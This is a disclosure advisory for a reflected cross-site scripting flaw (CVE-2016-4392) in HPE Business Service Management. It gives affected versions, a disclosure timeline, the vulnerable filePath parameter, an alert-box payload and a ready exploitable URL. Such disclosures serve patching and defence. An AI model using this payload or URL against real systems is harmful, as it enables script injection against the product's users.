HPE Business Service Management (BSM) – Reflected XSS (CVE-2016-4392)
Product & Service Introduction;
HP Business Service Management (BSM) is an end-to-end management solution that integrates network, server, application and business transaction monitoring. HP Business Service Management is developed and marketed by the HP Software Division.
Release Date;
21 Oct 2016
Affected Product;
HP Business Service Management Software 9.1x, 9.20 - 9.25IP1
Abstract Advisory Information;
Ugur Cihan Koc discovered a Reflected XSS vulnerability in HPE BSM
Vulnerability Disclosure Timeline;
27 Nov 2015 Bug reported to the vendor.
03 Dec 2015 Asked about the case.
21 Oct 2016 Fixed
25 Oct 2016 Discloused
Exploitation Technique;
Remote, Authenticated
TECHNICAL DETAILS Payloads;
"onload="alert(1)
Affected Parameter;
filePath
Exploitable URL;
http://[IP]/jsps/cheatsheets/openVideo.jsp?filePath=/%22onload=%22alert%281%29
Solution Fix & Patch;
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05316329
POC Video;
https://drive.google.com/open?id=0B-LWHbwdK3P9enAzbGVHUlFCa3c
Credits & Authors;
Ugur Cihan Koc @_uceka_ http://www.uceka.com